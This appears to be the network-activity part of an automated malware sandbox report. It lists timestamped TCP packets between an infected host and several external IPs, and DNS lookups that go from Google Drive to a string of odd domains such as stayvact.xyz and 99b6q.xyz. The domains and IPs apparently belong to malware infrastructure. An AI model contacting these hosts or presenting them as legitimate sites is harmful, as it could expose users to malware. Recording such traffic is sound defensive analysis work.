                                                                                                                                                    Oct 4, 2024 12:01:46.214350939 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.214503050 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:46.215877056 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:46.408169985 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.408291101 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.408303976 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.408401966 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:47.722795010 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.740272999 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.935056925 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:48.935321093 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.936840057 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.936860085 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:49.129507065 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.129637003 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.129652023 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.129997969 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.130125999 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.130249023 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:50.440988064 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.458724022 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.655621052 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.655910969 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.657408953 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.853878975 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854226112 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854379892 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854397058 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854409933 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854533911 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854813099 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.854813099 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.858206987 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:52.055877924 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:56.863384962 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:56.963453054 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:56.963601112 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:56.964999914 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.064975023 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074228048 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074249983 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074350119 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074362040 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074374914 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074385881 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074397087 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074400902 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074409008 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074419975 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074517012 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074517012 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074558020 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074565887 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074687004 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:58.470433950 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.487761021 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:18.638326883 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.638525009 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.638525009 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.641695976 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.826409101 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.654458046 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:23.756297112 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.756490946 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:23.757869959 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:23.858314991 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.858526945 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.858691931 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:25.261445045 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:25.362548113 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.278913975 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:26.383475065 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.383706093 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:26.385068893 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:26.486804008 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.487032890 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.487227917 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:27.885884047 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:27.987582922 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:28.903264046 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.004734993 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.004918098 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.006437063 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.006459951 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.106969118 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107079029 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107180119 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107192993 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107290983 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107402086 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107412100 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.527652025 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.630177021 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.630395889 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.631722927 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.733267069 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.734312057 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.734324932 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.734635115 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.736532927 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.837460995 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:36.745363951 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:37.061331034 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.061454058 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:37.062827110 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:37.373233080 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.373456955 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.373466969 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.373667002 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:38.571053982 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:39.590071917 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:39.908752918 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:39.908958912 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:39.910324097 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:40.228075027 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:40.228224039 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:40.228235960 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:40.228351116 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:41.414127111 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.431479931 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.736562967 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:42.736756086 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.738281012 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.738358021 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:43.042120934 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042146921 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042320967 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042331934 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042359114 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042527914 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042541981 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042665958 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:44.241652012 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.259232044 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.570910931 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.571146965 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.572509050 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.882010937 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.882251024 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.882359982 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.882627964 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.884489059 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:46.194264889 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:50.898555040 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:51.099401951 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.099610090 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:51.100986004 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:51.305381060 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.900362015 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.905674934 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.905751944 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:52.614861012 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:53.632155895 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:53.828783989 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:53.828947067 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:53.830348015 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:54.027076006 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:54.850675106 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:54.851078033 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:54.851294041 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:55.332987070 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.350353003 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.548943043 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:56.549158096 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.550652981 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.550703049 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.749583006 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:56.749593973 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:56.749620914 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:57.664015055 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:57.669387102 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:57.669540882 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:58.066750050 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.084095955 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.280715942 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:59.280927896 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.282289982 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.478884935 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:01.168243885 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:01.172589064 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:01.172727108 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:03:01.173413038 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:03:01.369944096 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.975059986 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.167608023 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.358145952 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.358345032 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.359771967 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.544938087 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557590008 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557605028 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557689905 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557703972 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558078051 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558078051 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558135033 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558149099 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558245897 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558377981 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558388948 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558500051 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558515072 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558636904 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558775902 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.741853952 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.741868973 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.741884947 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.742120981 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.742295027 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.745337009 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.928797960 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.760169029 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.861751080 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.861922026 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.863312960 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.963675976 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.964819908 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.964833021 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:02.965053082 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:02.966886044 CEST4983080192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:05:03.067462921 CEST804983013.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:07.977816105 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.282325029 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.282634974 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.283977032 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.587558031 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.587613106 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.587625027 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:08.587903976 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.589792013 CEST4983180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:05:08.893122911 CEST804983143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:13.601576090 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:13.800251007 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:13.800441027 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:13.801783085 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:14.000633001 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:14.457730055 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:14.458702087 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:14.458837032 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:14.459964037 CEST4983280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:05:14.658279896 CEST804983231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:19.475310087 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:19.626125097 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:19.626333952 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:19.627696037 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:19.783499002 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342416048 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342427969 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342467070 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:20.342732906 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:20.344851971 CEST4983380192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:05:20.506663084 CEST8049833191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.349033117 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.462680101 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.462827921 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.464319944 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.577817917 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.578280926 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.578363895 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:25.578613043 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.580804110 CEST4983480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:05:25.694762945 CEST8049834162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:40.933809042 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.120485067 CEST804983591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:41.120836020 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.122004986 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.308866024 CEST804983591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:41.308937073 CEST804983591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:05:41.309214115 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.311023951 CEST4983580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:05:41.497668982 CEST804983591.195.240.19192.168.11.20
Timestamp    Source Port    Dest Port    Source IP    Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 4, 2024 11:57:17.030560017 CEST | 192.168.11.20 | 1.1.1.1 | 0x8b8a | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:57:17.699305058 CEST | 192.168.11.20 | 1.1.1.1 | 0x2b3f | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:57:57.659681082 CEST | 192.168.11.20 | 1.1.1.1 | 0x5efe | Standard query (0) | www.seninbeniimikaf.buzz | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:02.774257898 CEST | 192.168.11.20 | 1.1.1.1 | 0x91b4 | Standard query (0) | www.eagleup.org | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:18.380317926 CEST | 192.168.11.20 | 1.1.1.1 | 0xceb1 | Standard query (0) | www.strategyvanguard.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:32.081716061 CEST | 192.168.11.20 | 1.1.1.1 | 0xe68f | Standard query (0) | www.philippatston.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:45.390846014 CEST | 192.168.11.20 | 1.1.1.1 | 0x4565 | Standard query (0) | www.stayvact.xyz | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:58:59.308728933 CEST | 192.168.11.20 | 1.1.1.1 | 0x7eae | Standard query (0) | www.sleephygienist.org | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:59:12.635586977 CEST | 192.168.11.20 | 1.1.1.1 | 0x3b86 | Standard query (0) | www.xn--fhq1c541j0zr.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:59:32.723328114 CEST | 192.168.11.20 | 1.1.1.1 | 0x5ad2 | Standard query (0) | www.jennarauten.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 11:59:47.282634974 CEST | 192.168.11.20 | 1.1.1.1 | 0x4a4a | Standard query (0) | www.taketechai.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:00.842680931 CEST | 192.168.11.20 | 1.1.1.1 | 0xff9e | Standard query (0) | www.297tamatest1kb.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 12:00:14.151706934 CEST | 192.168.11.20 | 1.1.1.1 | 0x1451 | Standard query (0) | www.99b6q.xyz | A (IP address) | IN (0x0001) | false
